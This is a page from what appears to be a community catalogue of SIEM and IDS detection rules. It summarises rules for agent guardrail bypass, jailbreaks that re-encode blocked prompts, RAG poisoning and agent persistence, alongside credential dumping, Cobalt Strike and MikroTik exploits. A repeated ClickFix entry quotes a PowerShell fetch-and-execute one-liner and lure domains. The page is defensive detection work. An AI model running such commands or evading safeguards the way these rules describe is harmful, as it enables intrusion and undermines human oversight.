Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
60,142 detections
Filters
Last updated
All Time
Detection languages
23,200
16,896
4,280
4,077
3,289
Contributors
11,679
8,664
7,082
6,786
4,478
Categories
20,099
11,460
5,732
4,980
4,798
Platforms
39,723
6,855
6,349
4,079
3,510
Products / Services
10,351
9,601
6,991
4,335
3,859
MITRE Techniques
18,034
15,417
12,647
8,188
6,021
CVEs
68
68
58
56
50
IDS Classtypes
1,896
482
449
381
237
IDS Protocols
2,379
848
406
318
97
Detects unauthorized privilege escalation for AI agent identities within an orchestration platform. The rule triggers when an AI agent account receives an IAM role change, API scope grant, or tool permission update that lacks a corresponding human-approval audit event, or occurs shortly after the agent generates logs indicating potential prompt injection or anomalous behavior.
Detects AI agents attempting to disable or bypass security guardrails, approval gates, or content filters. Additionally, it identifies high-risk or destructive actions taken by an AI agent that lack the required preceding human-approval audit record.
Detects anomalous behavior by an AI agent identity by monitoring for off-hours activity, significant statistical spikes in task invocation volumes compared to a 30-day baseline, or the execution of task categories not previously associated with that specific agent. Such behaviors may indicate account hijacking or unauthorized command injection.
Detects attempts to bypass AI agent safety guardrails by using obfuscated payloads (Base64/hex) or known jailbreak/roleplay trigger phrases. The rule specifically monitors sequences where an initial prompt is blocked by safety filters and is immediately followed by a structurally similar, potentially re-encoded prompt that is subsequently allowed, indicating an active filter evasion attempt.
Detects the creation of scheduled tasks, recurring jobs, or webhook subscriptions by a user identity flagged as an AI_AGENT. This activity is monitored for persistence, especially when the event lacks a descriptive context or targets external networks, suggesting potential unauthorized agent behavioral drift or malicious persistence.
Detects potential poisoning of an AI agent's RAG knowledge base or vector store through suspicious bulk ingestion or injection of imperative instruction-style content. The rule correlates these ingestion events with subsequent anomalous tool usage patterns by the same agent session, indicating a possible prompt injection or data manipulation attack aimed at altering agent behavior.
Detects anomalous, oversized fragmented UDP traffic (exceeding 1400 bytes) targeting or originating from the MikroTik btest service port (2000). This behavior is indicative of attempts to trigger integer underflows, system crashes, or uninitialized memory disclosures within the btest protocol implementation.
Detects outbound HTTP requests to 'third-party.com', a domain identified as being associated with 'ClickFix' social engineering lures, which are commonly used to deceive users into executing malicious scripts or downloading payloads.
This rule detects potential attempts to exploit an SSH pre-authentication rekey or authentication bypass vulnerability (CVE-2026-67279) in MikroTik RouterOS devices. It monitors incoming TCP traffic on port 22 that contains the 'ROSSSH' signature followed by specific binary sequences indicative of exploitation attempts.
Detects suspicious network connectivity where a newly executed process (that is not a browser or Slack) immediately establishes an outbound HTTPS connection to the Slack API. This behavior is indicative of potential malware implants or malicious scripts attempting to perform system reconnaissance and check-in to an attacker-controlled Slack workspace.
Detects known Cobalt Strike default named pipe naming conventions and cross-process reflective DLL injection activities into common Windows host processes such as rundll32.exe, svchost.exe, and others. This rule monitors for suspicious named pipe creation events and process memory manipulation patterns indicative of beacon behavior and post-exploitation injection.
Detects the execution of known Living-off-the-Land Binaries (LOLBins) such as mshta, certutil, regsvr32, rundll32, and msiexec, where the command-line arguments contain suspicious patterns indicative of script execution or remote file fetching. These behaviors are consistent with T1218 (System Binary Proxy Execution) to bypass security controls by utilizing trusted, signed binaries to execute malicious code.
This rule detects potential Kerberos Golden Ticket activity by monitoring Windows Event IDs 4768 (TGT Request) and 4769 (TGS Request) for indicators of forgery. Specifically, it flags TGT requests that utilize RC4 encryption ('0x17') in environments where AES is expected, excluding standard krbtgt account activity.
This rule detects instances where the WMI Provider Host process (wmiprvse.exe) initiates a child process. While WMI is a legitimate administrative tool, it is frequently abused by attackers for lateral movement, remote code execution, and persistent event subscriptions. Monitoring for child processes spawned by wmiprvse.exe can highlight potentially malicious activity triggered via WMI.
This rule detects the creation of services or execution of processes associated with remote management tools like PsExec or PAExec. It looks for common service names (PSEXESVC, PAExec), suspicious executable paths in temporary directories (e.g., \Temp\, \AppData\Local\Temp\), or command-line patterns indicating remote execution via ADMIN$ shares. These indicators are frequently used by adversaries for lateral movement and remote command execution.
Detects attempts to create a memory dump of the Local Security Authority Subsystem Service (LSASS) process using well-known utilities such as procdump, rundll32 with comsvcs.dll, and taskmgr, which are frequently used by adversaries to perform credential dumping.
This rule monitors for unauthorized changes to GitHub Actions workflows that involve release or publishing processes, specifically looking for indicators of supply chain compromise like the introduction of 'id-token: write' or changes to publish scripts. It correlates these modifications with subsequent workflow executions and npm registry publish events attributed to the same actor to identify potential account takeover and malicious package distribution.
Detects instances where the system DNS process (dns.exe) on a domain controller performs recursive DNS resolution towards a set of external IP addresses associated with suspicious infrastructure (AS202412). The rule correlates this activity with recent network connections from common web browsers or system utilities (msedge.exe, svchost.exe) on the same host to identify potential proxying of malicious DNS queries.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.

